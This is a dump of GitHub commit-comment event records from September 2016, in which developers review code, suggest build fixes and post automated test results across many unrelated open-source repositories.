{"id":"4566608361","type":"CommitCommentEvent","actor":{"login":"jdef"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":19031923,"position":2,"line":2,"path":"src/main/scala/mesosphere/marathon/stream/StreamConversions.scala","commit_id":"7fda070159fa962d257ba39d34adb3f669fb5429","created_at":"2016-09-15T07:55:40Z","updated_at":"2016-09-15T07:55:40Z","body":"why this type of double package notation?"}},"created_at":"2016-09-15T07:55:40Z"}
{"id":"4566609062","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-editor-php-library"},"payload":{"comment":{"id":19031925,"position":null,"line":null,"path":null,"commit_id":"c70cac28c9171f2ccc7a3765b02196a6547e1b62","created_at":"2016-09-15T07:55:50Z","updated_at":"2016-09-15T07:55:50Z","body":"At this stage, I wish we could stop introducing new improvements and rather focus on fixing the bugs at hand. Don't you agree? It doesn't even look like these changes are properly tested. \r\nAdditionally, they will create an inconsistent experience throughout the editor as some messages will say 'text field' while others still will use their property name. If we are to change this we should do it for all messages!"}},"created_at":"2016-09-15T07:55:50Z"}
{"id":"4566609941","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/mega-machinery"},"payload":{"comment":{"id":19031927,"position":16,"line":4087,"path":"local/templates/mega_machinery/css/style.css","commit_id":"980b73f92348ff65a68a9c409546b023eb607f4f","created_at":"2016-09-15T07:56:05Z","updated_at":"2016-09-15T07:56:05Z","body":"Оформление не навешивается на js-классы"}},"created_at":"2016-09-15T07:56:05Z"}
{"id":"4566610241","type":"CommitCommentEvent","actor":{"login":"unixbhaskar"},"repo":{"name":"unixbhaskar/DevopsWiki"},"payload":{"comment":{"id":19031928,"position":null,"line":null,"path":null,"commit_id":"29c26bad802654fe4fce4bbfde62c5db86e0e8dc","created_at":"2016-09-15T07:56:10Z","updated_at":"2016-09-15T07:56:10Z","body":"Please put it under \"git section\" ."}},"created_at":"2016-09-15T07:56:10Z"}
{"id":"4566610268","type":"CommitCommentEvent","actor":{"login":"Mazda--"},"repo":{"name":"DirtyUnicorns/android_packages_apps_Settings"},"payload":{"comment":{"id":19031929,"position":null,"line":null,"path":null,"commit_id":"2cc5f0457adfb02100c3c030badb5b30eeaa2afa","created_at":"2016-09-15T07:56:11Z","updated_at":"2016-09-15T07:56:11Z","body":"Suggestion is when it asks you to change the wallpaper or pick a voice assistant and dumb crap like that.\r\n\r\nLike @snak3ater said, that's falling under conditional. I'll be adding thatthat here soon if someone does not do it"}},"created_at":"2016-09-15T07:56:11Z"}
{"id":"4566610788","type":"CommitCommentEvent","actor":{"login":"ferhung-mtk"},"repo":{"name":"xen0n/android_device_meizu_arale"},"payload":{"comment":{"id":19031931,"position":null,"line":null,"path":null,"commit_id":"6b29c0ddd1ce3efa841365c22d9d63a993180be6","created_at":"2016-09-15T07:56:18Z","updated_at":"2016-09-15T07:56:18Z","body":"https://github.com/ferhung-mtk/android_system_sepolicy/commit/7f04f14ea5ec8daace2ac9c405e8b3bd5a23b3ca\r\n\r\nTo see my commit. It booted well on my recovery which was build in android N."}},"created_at":"2016-09-15T07:56:18Z"}
{"id":"4566611769","type":"CommitCommentEvent","actor":{"login":"rouazana"},"repo":{"name":"linagora/james-project"},"payload":{"comment":{"id":19031932,"position":4,"line":175,"path":"mailet/base/src/test/java/org/apache/mailet/base/test/FakeMail.java","commit_id":"6930faaa8b3dfbfd9ecb8ef78fd08567899e6dae","created_at":"2016-09-15T07:56:35Z","updated_at":"2016-09-15T07:56:35Z","body":"I think default() is sufficient."}},"created_at":"2016-09-15T07:56:35Z"}
{"id":"4566612711","type":"CommitCommentEvent","actor":{"login":"adelcastillo"},"repo":{"name":"jorgediaz-lr/generate-modules-classpath"},"payload":{"comment":{"id":19031935,"position":null,"line":null,"path":null,"commit_id":"cc5ceffe00b8804688b77172bc6451dd554ed285","created_at":"2016-09-15T07:56:50Z","updated_at":"2016-09-15T07:56:50Z","body":"Tried right now, everything seems ok! Thank you for the change!\r\n\r\nAlso, take in mind that for us, people *not* working with the full DXP code, can use this script for that version. This means for example that the zipped version of the code does not include any ant file to run \"ant all\".\r\n\r\nQuick workarounds for this is simple make ant all for the CE version or use gradle to download everything. \r\n\r\nAnyway, thank you again for sharing this!, made my work easier :) 👍 "}},"created_at":"2016-09-15T07:56:50Z"}
{"id":"4566615955","type":"CommitCommentEvent","actor":{"login":"jbguerraz"},"repo":{"name":"rundeck/rundeck"},"payload":{"comment":{"id":19031946,"position":58,"line":51,"path":"packaging/Makefile","commit_id":"cabe19c5efd7a44d97348a8031fb136152b2bd4e","created_at":"2016-09-15T07:57:42Z","updated_at":"2016-09-15T07:57:42Z","body":"@gschueler Indeed. Even if I was wondering more about why a regex based exclude instead of a name based one.\r\nI \"ported\" it to Alpine Linux and used -name variant instead of -regex.\r\nAlso, for information, I used \"-a\" (POSIX) instead of \"-and\" (GNU) so I could get rid of the findutils dependency. See https://github.com/alpinelinux/aports/pull/296/files#diff-35db6a066ef47940a3becdb8e1e74656R79"}},"created_at":"2016-09-15T07:57:42Z"}
{"id":"4566618261","type":"CommitCommentEvent","actor":{"login":"Warrior-"},"repo":{"name":"Shestak/ShestakUI"},"payload":{"comment":{"id":19031954,"position":null,"line":null,"path":null,"commit_id":"64d282b8e87b88430c605f60b335aad27bcdeb47","created_at":"2016-09-15T07:58:20Z","updated_at":"2016-09-15T07:58:20Z","body":"А че сразу дизлайкать то?)) Я просто к тому, что если оставить предыдущие дебаффы, то они никак не испортят сборку, а так показываться будут. Я плохого в этом не вижу ничего)"}},"created_at":"2016-09-15T07:58:20Z"}
{"id":"4566619268","type":"CommitCommentEvent","actor":{"login":"brunotl"},"repo":{"name":"LK8000/LK8000"},"payload":{"comment":{"id":19031957,"position":5,"line":203,"path":"Common/Source/Comm/ComPort.cpp","commit_id":"96dd04a291aa023bd5f7fac2576d0e9aba65dd73","created_at":"2016-09-15T07:58:36Z","updated_at":"2016-09-15T07:58:36Z","body":"bug : no more notification about SerialPort Error with this change."}},"created_at":"2016-09-15T07:58:36Z"}
{"id":"4566620380","type":"CommitCommentEvent","actor":{"login":"Pafcholini"},"repo":{"name":"CMRemix/android_device_samsung_trlte-common"},"payload":{"comment":{"id":19031960,"position":null,"line":null,"path":null,"commit_id":"86b48164b7987488df706d36112599b9b58a5f10","created_at":"2016-09-15T07:58:54Z","updated_at":"2016-09-15T07:58:54Z","body":"Mate you should set this: Pavel:\r\nTARGET_KERNEL_CROSS_COMPILE_PREFIX := arm-linux-androideabi-"}},"created_at":"2016-09-15T07:58:54Z"}
{"id":"4566622406","type":"CommitCommentEvent","actor":{"login":"TCC-9"},"repo":{"name":"python-git/python"},"payload":{"comment":{"id":19031965,"position":4,"line":80,"path":"Include/pymath.h","commit_id":"835fe383df0e5c25a09a3c0a2a1cfdc8efd35674","created_at":"2016-09-15T07:59:25Z","updated_at":"2016-09-15T07:59:25Z","body":"LOL"}},"created_at":"2016-09-15T07:59:25Z"}
{"id":"4566627434","type":"CommitCommentEvent","actor":{"login":"mstud"},"repo":{"name":"SchedMD/slurm"},"payload":{"comment":{"id":19031972,"position":null,"line":null,"path":null,"commit_id":"f502f1e57aed91616b71d9d8361a682f3d822231","created_at":"2016-09-15T08:00:41Z","updated_at":"2016-09-15T08:00:41Z","body":"This fix does not seem to work for jobacct_gather plugins. Correct me if I'm wrong, but it is my understanding that the file descriptors of the freeipmi lib are opened in slurmstepd, so setting this flag here does have no effect at all for those.\r\nWe are running SLURM 16.05 (which includes this change) and the fd is still leaked:\r\n$ srun bash -c \"ls -la /proc/self/fd\"\r\n[...]\r\nlrwx------ 1 myuser mygroup 64 15. Sep 09:57 5 -> /dev/ipmi0"}},"created_at":"2016-09-15T08:00:41Z"}
{"id":"4566630302","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"Kiryusha/GIB_Dashboard"},"payload":{"comment":{"id":19031979,"position":40,"line":40,"path":".development/src/js/db-block/tooltip.js","commit_id":"7a45ef3443b4a0891d08b983a0a895d5a69c47a0","created_at":"2016-09-15T08:01:24Z","updated_at":"2016-09-15T08:01:24Z","body":"@Kiryusha Есть подозрение, что в IE с этим будут проблемы."}},"created_at":"2016-09-15T08:01:24Z"}
{"id":"4566638043","type":"CommitCommentEvent","actor":{"login":"Murthy10"},"repo":{"name":"Murthy10/OSMstream"},"payload":{"comment":{"id":19031991,"position":null,"line":null,"path":null,"commit_id":"8490bd6eecd61c83dd0a10b12ec114e0297c6099","created_at":"2016-09-15T08:03:25Z","updated_at":"2016-09-15T08:03:25Z","body":"The readme is no up to date and should give an overview about the repo.\r\n"}},"created_at":"2016-09-15T08:03:25Z"}
{"id":"4566638756","type":"CommitCommentEvent","actor":{"login":"dregad"},"repo":{"name":"ADOdb/ADOdb"},"payload":{"comment":{"id":19031993,"position":null,"line":null,"path":null,"commit_id":"27bcd7d09f25850ac6e77847a32f04e0012f4671","created_at":"2016-09-15T08:03:37Z","updated_at":"2016-09-15T08:03:37Z","body":"I'll reopen #267, we can continue the discussion there."}},"created_at":"2016-09-15T08:03:37Z"}
{"id":"4566638804","type":"CommitCommentEvent","actor":{"login":"maxim5"},"repo":{"name":"maxim5/test"},"payload":{"comment":{"id":19031995,"position":null,"line":null,"path":null,"commit_id":"fd5cc1d1763810bb14c8521b79b98fafc017c467","created_at":"2016-09-15T08:03:38Z","updated_at":"2016-09-15T08:03:38Z","body":"|`src/com/badlogic/androidgames/KeyTest.java:48`|\n|---|\nfd5cc1d1763810bb14c8521b79b98fafc017c467:  return true;"}},"created_at":"2016-09-15T08:03:38Z"}
{"id":"4566640804","type":"CommitCommentEvent","actor":{"login":"Pafcholini"},"repo":{"name":"CMRemix/android_device_samsung_trltetmo"},"payload":{"comment":{"id":19032004,"position":null,"line":null,"path":null,"commit_id":"f8e413dca09ff700163152eb25853647c4ce5ad5","created_at":"2016-09-15T08:04:12Z","updated_at":"2016-09-15T08:04:12Z","body":"To set property the init lib: \r\n\r\nhttps://github.com/Emotroid-Rom/android_device_samsung_trltexx/commit/7f69a4da67d196525c14910d80a8a394b6f4f410\r\n\r\nAnd this build fix\r\nhttps://github.com/Emotroid-Rom/android_device_samsung_trltexx/commit/98267ca26fb2dcd4674db1bf82973f77ca5b843a\r\n\r\nI hope you can compile soon nougat for Note 4. I sold my Note 4 but I'll try to contribute a bit more.\r\n"}},"created_at":"2016-09-15T08:04:12Z"}
{"id":"4566644437","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19032011,"position":null,"line":null,"path":null,"commit_id":"5a365e54deb644b86a634dbb422c67c25bcc6393","created_at":"2016-09-15T08:05:09Z","updated_at":"2016-09-15T08:05:09Z","body":"versionNumbers (mitchute) - Win64-Windows-7-VisualStudio-12: OK (2335 of 2335 tests passed, 21 test warnings)\n\n * 21 tests had: EIO diffs.\n * 21 tests had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5a365e54deb644b86a634dbb422c67c25bcc6393-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5a365e54deb644b86a634dbb422c67c25bcc6393-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-15T08:05:09Z"}
{"id":"4566647880","type":"CommitCommentEvent","actor":{"login":"Martin-Wegner"},"repo":{"name":"angular/angular.io"},"payload":{"comment":{"id":19032018,"position":null,"line":null,"path":null,"commit_id":"69ae63c4b1d525936c1e445320258b79bd64efca","created_at":"2016-09-15T08:05:49Z","updated_at":"2016-09-15T08:05:49Z","body":"You changed `public/docs/_examples/webpack/ts/config/webpack.common.js` and `public/docs/_examples/webpack/ts/config/webpack.test.js` and replaced `ts` with `awesome-typescript-loader`. Yo you can remove `\"ts-loader\": \"^0.8.1\",` from the `public/docs/_examples/webpack/ts/package.webpack.json`."}},"created_at":"2016-09-15T08:05:49Z"}
{"id":"4566649049","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19032024,"position":59,"line":426,"path":"ryu/lib/stplib.py","commit_id":"72a4aad28dce9fc7b0f840329b3f8a77e685f372","created_at":"2016-09-15T08:06:09Z","updated_at":"2016-09-15T08:06:09Z","body":"余計な修正でした。元に戻します。"}},"created_at":"2016-09-15T08:06:09Z"}
{"id":"4566651036","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"kvirc/KVIrc"},"payload":{"comment":{"id":19032032,"position":null,"line":null,"path":null,"commit_id":"eba87768bc7394b5dc5d62c5e6274fae53039ab8","created_at":"2016-09-15T08:06:39Z","updated_at":"2016-09-15T08:06:39Z","body":"@IceN9ne well `\\r!nc\\r%Q\\r` creates links that dont append any brackets to channel or nicks, however channel name links are created and treated as if they are nick links."}},"created_at":"2016-09-15T08:06:39Z"}
{"id":"4566651790","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown-Client"},"payload":{"comment":{"id":19032036,"position":null,"line":null,"path":null,"commit_id":"05914194c65b8acdf6cda250d2facc075e331f3a","created_at":"2016-09-15T08:06:52Z","updated_at":"2016-09-15T08:06:52Z","body":"That doesn't seem like a hack to me. At least, I don't have a better solution for it."}},"created_at":"2016-09-15T08:06:52Z"}
{"id":"4566651810","type":"CommitCommentEvent","actor":{"login":"FrancescVargas"},"repo":{"name":"FrancescVargas/ramas"},"payload":{"comment":{"id":19032037,"position":null,"line":null,"path":null,"commit_id":"465b2f96397916546c081c1d75281d27f50ef6c5","created_at":"2016-09-15T08:06:52Z","updated_at":"2016-09-15T08:06:52Z","body":"Fusionada con rama \"otra\""}},"created_at":"2016-09-15T08:06:52Z"}
{"id":"4566654489","type":"CommitCommentEvent","actor":{"login":"bojidar-bg"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":19032044,"position":null,"line":null,"path":null,"commit_id":"a4156f1f0a69bcf4d7c1f43550a39a76cc389e0a","created_at":"2016-09-15T08:07:35Z","updated_at":"2016-09-15T08:07:35Z","body":"Really? So fast? :tada: 2.2 would be the best release ever (and 3.0 as well, but, yeah..)"}},"created_at":"2016-09-15T08:07:35Z"}
{"id":"4566659492","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19032058,"position":null,"line":null,"path":null,"commit_id":"cbce352cdc45e56000eba299168b54ae1c95ea0e","created_at":"2016-09-15T08:08:57Z","updated_at":"2016-09-15T08:08:57Z","body":"os_2_0_develop_linux (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-cbce352cdc45e56000eba299168b54ae1c95ea0e-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-cbce352cdc45e56000eba299168b54ae1c95ea0e-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-15T08:08:57Z"}
{"id":"4566661697","type":"CommitCommentEvent","actor":{"login":"hmlth"},"repo":{"name":"edf-hpc/puppet-hpc"},"payload":{"comment":{"id":19032064,"position":null,"line":null,"path":null,"commit_id":"a1ba2fa8f9ea9266ac6f2113734e54f350f53283","created_at":"2016-09-15T08:09:32Z","updated_at":"2016-09-15T08:09:32Z","body":"Wrong bug ID, it fixes #55"}},"created_at":"2016-09-15T08:09:32Z"}
{"id":"4566668970","type":"CommitCommentEvent","actor":{"login":"rokimoki"},"repo":{"name":"rokimoki/LittleCP"},"payload":{"comment":{"id":19032074,"position":6,"line":16,"path":"modules/configuration.php","commit_id":"3ac0dda7c1c328bf37df84c3c3e2314d2c5d2888","created_at":"2016-09-15T08:11:23Z","updated_at":"2016-09-15T08:11:23Z","body":"Yeah and maybe not, I knew this will be updated but this is not an existing server, and that's my contact email. I thought it could be useful eventually."}},"created_at":"2016-09-15T08:11:23Z"}
{"id":"4566669368","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19032076,"position":null,"line":null,"path":null,"commit_id":"cbce352cdc45e56000eba299168b54ae1c95ea0e","created_at":"2016-09-15T08:11:29Z","updated_at":"2016-09-15T08:11:29Z","body":"os_2_0_develop_linux (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-cbce352cdc45e56000eba299168b54ae1c95ea0e-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-cbce352cdc45e56000eba299168b54ae1c95ea0e-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-15T08:11:29Z"}
{"id":"4566671596","type":"CommitCommentEvent","actor":{"login":"judovana"},"repo":{"name":"judovana/jenkins-report-jck"},"payload":{"comment":{"id":19032081,"position":null,"line":null,"path":null,"commit_id":"5f213f0e566a414be4dc5b2484ffe650ec2dc789","created_at":"2016-09-15T08:12:06Z","updated_at":"2016-09-15T08:12:06Z","body":"i had much more comments in mind;( nand you forget to remove changes in pom.xml. nvm i iwill merge and fix on my own.thanx!"}},"created_at":"2016-09-15T08:12:06Z"}
{"id":"4566678701","type":"CommitCommentEvent","actor":{"login":"NikoKrause"},"repo":{"name":"linuxmint/Cinnamon"},"payload":{"comment":{"id":19032103,"position":null,"line":null,"path":null,"commit_id":"b9344bb9829a3a2e8d886e60eda7d6dd64360a53","created_at":"2016-09-15T08:13:55Z","updated_at":"2016-09-15T08:13:55Z","body":"@mtwebster \r\nMaybe you can get in touch with the developer of xkb and ask if he could add a line for flags in bis code, so people who create new keyboard layouts could  determine which flags should be used for their layout?"}},"created_at":"2016-09-15T08:13:55Z"}
{"id":"4566683216","type":"CommitCommentEvent","actor":{"login":"quynhn"},"repo":{"name":"linagora/james-project"},"payload":{"comment":{"id":19032112,"position":4,"line":175,"path":"mailet/base/src/test/java/org/apache/mailet/base/test/FakeMail.java","commit_id":"6930faaa8b3dfbfd9ecb8ef78fd08567899e6dae","created_at":"2016-09-15T08:15:07Z","updated_at":"2016-09-15T08:15:07Z","body":"\"default\" is keyword so we cannot do it"}},"created_at":"2016-09-15T08:15:07Z"}
{"id":"4566683753","type":"CommitCommentEvent","actor":{"login":"maxim5"},"repo":{"name":"maxim5/test"},"payload":{"comment":{"id":19032114,"position":null,"line":null,"path":null,"commit_id":"fd5cc1d1763810bb14c8521b79b98fafc017c467","created_at":"2016-09-15T08:15:15Z","updated_at":"2016-09-15T08:15:15Z","body":"reply"}},"created_at":"2016-09-15T08:15:15Z"}
{"id":"4566689432","type":"CommitCommentEvent","actor":{"login":"bwidtmann"},"repo":{"name":"maxdome/hasplayer.js"},"payload":{"comment":{"id":19032127,"position":32,"line":402,"path":"app/js/streaming/protection/ProtectionModel_01b.js","commit_id":"0707f0ebc8f12fa9ac9baf01e922cf6280a76f0d","created_at":"2016-09-15T08:16:39Z","updated_at":"2016-09-15T08:16:39Z","body":"that's very important in case of using EME v0.1b"}},"created_at":"2016-09-15T08:16:39Z"}
{"id":"4566690597","type":"CommitCommentEvent","actor":{"login":"christianwach"},"repo":{"name":"indieweb/wordpress-indieweb"},"payload":{"comment":{"id":19032132,"position":7,"line":5,"path":"includes/getting-started.php","commit_id":"fd384d3d07dd7d8f2a2525b9e01d31aeb352dc98","created_at":"2016-09-15T08:16:56Z","updated_at":"2016-09-15T08:16:56Z","body":"I'm taking a random example here to say that `_e()` is completely sufficient when translating a string with no possible user input. This commit adds unnecessary overhead to the template file(s)."}},"created_at":"2016-09-15T08:16:56Z"}
{"id":"4566690964","type":"CommitCommentEvent","actor":{"login":"kaedroho"},"repo":{"name":"torchbox/wagtail"},"payload":{"comment":{"id":19032133,"position":35,"line":382,"path":"docs/reference/hooks.rst","commit_id":"8b9b2ced36c641d08b364725f3ab4b530b5eaec3","created_at":"2016-09-15T08:17:02Z","updated_at":"2016-09-15T08:17:02Z","body":"Oops, thanks for spotting!"}},"created_at":"2016-09-15T08:17:02Z"}
{"id":"4566692159","type":"CommitCommentEvent","actor":{"login":"cesar991"},"repo":{"name":"pandorafms/pandorafms"},"payload":{"comment":{"id":19032137,"position":null,"line":null,"path":null,"commit_id":"7b59f09eafd12c4833c83a136bb018f85697e58c","created_at":"2016-09-15T08:17:22Z","updated_at":"2016-09-15T08:17:22Z","body":"Thanks for your recommendation."}},"created_at":"2016-09-15T08:17:22Z"}
{"id":"4566693741","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":19032140,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-15T08:17:47Z","updated_at":"2016-09-15T08:17:47Z","body":"Sure xD"}},"created_at":"2016-09-15T08:17:47Z"}
{"id":"4566694905","type":"CommitCommentEvent","actor":{"login":"rmacklin"},"repo":{"name":"AppFolioOnboarding/base"},"payload":{"comment":{"id":19032146,"position":null,"line":null,"path":null,"commit_id":"9974e08a51efd875bfd0de9844c60c62ab061ae2","created_at":"2016-09-15T08:18:04Z","updated_at":"2016-09-15T08:18:04Z","body":"Move this commit to master"}},"created_at":"2016-09-15T08:18:04Z"}
{"id":"4566695986","type":"CommitCommentEvent","actor":{"login":"kaedroho"},"repo":{"name":"torchbox/wagtail"},"payload":{"comment":{"id":19032149,"position":35,"line":382,"path":"docs/reference/hooks.rst","commit_id":"8b9b2ced36c641d08b364725f3ab4b530b5eaec3","created_at":"2016-09-15T08:18:19Z","updated_at":"2016-09-15T08:18:19Z","body":"Fixed in: https://github.com/torchbox/wagtail/commit/4dc1ef05f893470f0df7a552448c6bf4f5214a0c"}},"created_at":"2016-09-15T08:18:19Z"}
{"id":"4566696064","type":"CommitCommentEvent","actor":{"login":"Zerotask"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19032150,"position":null,"line":null,"path":null,"commit_id":"eaa3aa3e3889c539f5e44a579990fa2d6cd52824","created_at":"2016-09-15T08:18:20Z","updated_at":"2016-09-15T08:18:20Z","body":"and Poliwrath is water **and** fighting. In the file it's only water."}},"created_at":"2016-09-15T08:18:20Z"}
{"id":"4566696456","type":"CommitCommentEvent","actor":{"login":"rmacklin"},"repo":{"name":"AppFolioOnboarding/base"},"payload":{"comment":{"id":19032151,"position":null,"line":null,"path":null,"commit_id":"db35fb2f909167ff4c4d7daf8420bfa06f6df5b8","created_at":"2016-09-15T08:18:26Z","updated_at":"2016-09-15T08:18:26Z","body":"Backdate this commit so it doesn't appear out of order"}},"created_at":"2016-09-15T08:18:26Z"}
{"id":"4566698226","type":"CommitCommentEvent","actor":{"login":"aliammar7"},"repo":{"name":"dinosaadeh/Barjis"},"payload":{"comment":{"id":19032154,"position":6,"line":126,"path":"core/src/com/smb215team/barjis/game/objects/Pawn.java","commit_id":"d24422ba9750b447fba67a2ac59b35acc275a5b7","created_at":"2016-09-15T08:18:53Z","updated_at":"2016-09-15T08:18:53Z","body":"i replace it , i don't delete it see down their"}},"created_at":"2016-09-15T08:18:53Z"}
{"id":"4566699120","type":"CommitCommentEvent","actor":{"login":"aliammar7"},"repo":{"name":"dinosaadeh/Barjis"},"payload":{"comment":{"id":19032155,"position":9,"line":126,"path":"core/src/com/smb215team/barjis/game/objects/Pawn.java","commit_id":"d24422ba9750b447fba67a2ac59b35acc275a5b7","created_at":"2016-09-15T08:19:07Z","updated_at":"2016-09-15T08:19:07Z","body":"@dinosaadeh  here\r\n"}},"created_at":"2016-09-15T08:19:07Z"}
{"id":"4566700327","type":"CommitCommentEvent","actor":{"login":"julienlancelot"},"repo":{"name":"SonarSource/sonarqube"},"payload":{"comment":{"id":19032158,"position":31,"line":58,"path":"server/sonar-web/src/main/webapp/WEB-INF/app/models/property.rb","commit_id":"77bd719aedd53e98d72ea00a656773fe7e0a4e48","created_at":"2016-09-15T08:19:23Z","updated_at":"2016-09-15T08:19:23Z","body":"@seb you should use resource_id.to_i"}},"created_at":"2016-09-15T08:19:23Z"}
{"id":"4566700597","type":"CommitCommentEvent","actor":{"login":"christianwach"},"repo":{"name":"indieweb/wordpress-indieweb"},"payload":{"comment":{"id":19032159,"position":26,"line":170,"path":"includes/class-hcard-user.php","commit_id":"fd384d3d07dd7d8f2a2525b9e01d31aeb352dc98","created_at":"2016-09-15T08:19:28Z","updated_at":"2016-09-15T08:19:28Z","body":"FWIW, attributes should be escaped with the `esc_attr()` family of functions."}},"created_at":"2016-09-15T08:19:28Z"}
{"id":"4566700760","type":"CommitCommentEvent","actor":{"login":"mchf"},"repo":{"name":"SUSE/doc-sle"},"payload":{"comment":{"id":19032160,"position":33,"line":14939,"path":"xml/ay_bigfile.xml","commit_id":"0441abd675837fc3b1688e69be50d68420163676","created_at":"2016-09-15T08:19:30Z","updated_at":"2016-09-15T08:19:30Z","body":"typo: ```autopyast```"}},"created_at":"2016-09-15T08:19:30Z"}
{"id":"4566701252","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19032162,"position":null,"line":null,"path":null,"commit_id":"c6a5bac3b25ab75c405491f66b5e1e372d08b5e8","created_at":"2016-09-15T08:19:36Z","updated_at":"2016-09-15T08:19:36Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1763 of 1764 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6a5bac3b25ab75c405491f66b5e1e372d08b5e8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6a5bac3b25ab75c405491f66b5e1e372d08b5e8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6a5bac3b25ab75c405491f66b5e1e372d08b5e8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-15T08:19:36Z"}
{"id":"4566702048","type":"CommitCommentEvent","actor":{"login":"anantheshadiga"},"repo":{"name":"abhidemon/MultiDbWebApp"},"payload":{"comment":{"id":19032164,"position":5,"line":3,"path":"README.md","commit_id":"4e0ae40e13813d21de78d766ceb871d3f93f3c58","created_at":"2016-09-15T08:19:47Z","updated_at":"2016-09-15T08:19:47Z","body":"Readme should be more elaborative with the information about how to install any third party software which are pre-requirement to start your application, Along with that steps to start your application will also be appreciated"}},"created_at":"2016-09-15T08:19:47Z"}
{"id":"4566702626","type":"CommitCommentEvent","actor":{"login":"julienlancelot"},"repo":{"name":"SonarSource/sonarqube"},"payload":{"comment":{"id":19032167,"position":97,"line":127,"path":"server/sonar-web/src/main/webapp/WEB-INF/app/models/property.rb","commit_id":"77bd719aedd53e98d72ea00a656773fe7e0a4e48","created_at":"2016-09-15T08:19:55Z","updated_at":"2016-09-15T08:19:55Z","body":"@seb resource_id.to_i should be used"}},"created_at":"2016-09-15T08:19:55Z"}
{"id":"4566704258","type":"CommitCommentEvent","actor":{"login":"rmacklin"},"repo":{"name":"AppFolioOnboarding/base"},"payload":{"comment":{"id":19032170,"position":21,"line":19,"path":"test/flows/images_crud_test.rb","commit_id":"4f1e67ad41ba3a8e87f76fad321a4bd017b4f383","created_at":"2016-09-15T08:20:19Z","updated_at":"2016-09-15T08:20:19Z","body":"Change to `assert_equal image_url, image_show_page.image_url`"}},"created_at":"2016-09-15T08:20:19Z"}
{"id":"4566706386","type":"CommitCommentEvent","actor":{"login":"xalopp"},"repo":{"name":"Microsoft/msphpsql"},"payload":{"comment":{"id":19032173,"position":77,"line":2781,"path":"source/pdo_sqlsrv/FormattedPrint.cpp","commit_id":"4ccffbbe077e87288bf00cc6327142579da46775","created_at":"2016-09-15T08:20:46Z","updated_at":"2016-09-15T08:20:46Z","body":"Add a space before the last dash to make the coding style more consistent."}},"created_at":"2016-09-15T08:20:46Z"}
{"id":"4566708127","type":"CommitCommentEvent","actor":{"login":"rmacklin"},"repo":{"name":"AppFolioOnboarding/base"},"payload":{"comment":{"id":19032177,"position":22,"line":22,"path":"test/page_objects/images/show_page.rb","commit_id":"4f1e67ad41ba3a8e87f76fad321a4bd017b4f383","created_at":"2016-09-15T08:21:12Z","updated_at":"2016-09-15T08:21:12Z","body":"Delete these two lines (make them part of the TODO)"}},"created_at":"2016-09-15T08:21:12Z"}
